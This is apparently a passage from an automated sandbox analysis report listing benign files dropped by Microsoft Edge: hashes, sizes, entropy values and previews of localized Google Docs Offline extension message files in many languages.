                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
